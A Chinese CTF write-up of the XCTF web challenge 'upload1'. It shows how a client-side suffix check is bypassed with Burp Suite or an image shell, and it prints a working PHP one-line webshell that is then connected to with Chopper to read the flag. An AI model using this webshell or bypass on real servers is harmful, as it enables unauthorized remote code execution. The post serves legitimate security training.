攻防世界 web题——upload1

打开看到要我们上传文件:
在这里插入图片描述文件上传的漏洞。
查看源码,可以看到一段js代码:
在这里插入图片描述

Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}


}

可以看到这里只是对文件名后缀进行了判断,存在上传漏洞。
选择上传一句话木马
<?php @eval($_POST['aaa']);?>
和之前刷的靶场upload-labs 的第一关类似,绕过js代码只需要先修改上传文件的后缀名为允许的.jpg 或.png,用burpsuite抓包后就改后缀名为 .php 再上传。

或者是上传图片马。

我先试了试上传图片马
在这里插入图片描述
上传成功了
访问也没有异常
在这里插入图片描述然后尝试用菜刀连接获取shell

就在我以为我成功了的时候。。。
在这里插入图片描述我发现这个flag.txt 打不开。。。?
在这里插入图片描述感觉我获取了个假的shell…

然后我又尝试了第一种方法,用burpsuite改包
在这里插入图片描述上传成功

然后试试连接菜刀获取shell

这次我发现 获取的shell和上次的不一样了
在这里插入图片描述这次找对了,发现flag在flag.php中
在这里插入图片描述

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值